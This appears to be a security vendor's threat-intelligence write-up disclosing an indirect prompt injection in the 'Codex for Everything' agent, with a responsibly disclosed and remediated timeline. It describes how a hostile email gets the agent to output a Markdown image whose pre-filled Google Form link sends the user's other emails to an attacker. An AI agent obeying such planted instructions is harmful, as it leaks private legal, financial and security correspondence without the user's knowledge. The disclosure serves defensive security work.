Solutions

Industries

Partners

Resources

Book a Demo

Threat Intelligence

Table of Content

Codex for Everything Exfiltrates Connected Data

Codex for Everything was susceptible to data exfiltration via indirect prompt injection, exposing sensitive data from connected apps with no human-in-the-loop steps required.

Codex for Everything Exfiltrates Connected Data

Overview

‘Codex for Everything’ is an update to Codex that enables its use beyond coding, for day-to-day tasks. It includes over 90 new plugins and features, such as ‘browser use’ and ‘computer use’, that make Codex an all-purpose agent in a bid to compete with Anthropic’s Claude Cowork and Microsoft’s Copilot Cowork. 

In this article, we demonstrate that a malicious email could manipulate Codex for Everything to exfiltrate the complete contents of other emails Codex was reviewing. Exfiltration occurred via outputting a malicious image, which triggered an automatic submission to an attacker-controlled Google form.

We demonstrate the vulnerability via an indirect prompt injection in an untrusted email, but an injection in any untrusted data source could exploit the vulnerability across Codex use cases.

This vulnerability was responsibly disclosed on April 21, 2026, and has been remediated by OpenAI. More details on the responsible disclosure are at the end of the article.

The Attack Chain

  1. A user asks Codex for help reviewing emails

    User asks Codex for Everything to triage their emails

    OpenAI's Email plugin comes with a Skill for triaging emails, and reviewing emails is part of a demonstrated use case in the Codex for Everything release.


  2. A prompt injection is hidden in one of the emails Codex finds

    The user’s inbox contains an email from an external party that includes a prompt injection. 

    The user recieves an email containing a prompt injection.

    Email content is not displayed to the user during Codex’s review process.


  3. Codex is manipulated to output an insecure image, triggering data exfiltration

    Codex is manipulated to generate and output Markdown image syntax that contains a pre-filled Google Form submission link, populated with the victim's email data. This automatically submits the victims' emails to an attacker-controlled Google Form.

    No user interaction is required beyond submission of the initial email triage query.

    Codex outputs a malicious image that exfiltrates data.


  4. The attacker can view the victim’s emails in their Google Form submissions

    This attack exfiltrated sensitive emails, including legal correspondence, organizational financial planning, and security-related notifications.

    Data exfiltrated from Codex is in the attacker's Google Form responses


Responsible Disclosure

This vulnerability was responsibly disclosed on Apr 21, 2026, and the vulnerability has been remediated by OpenAI.

Timeline

Apr 21, 2026 PromptArmor discloses to OpenAI via HackerOne
May  6, 2026 HackerOne requests additional details
May  6, 2026 PromptArmor follows up
May 14, 2026 HackerOne validates and triages the vulnerability
May 21, 2026 Public disclosure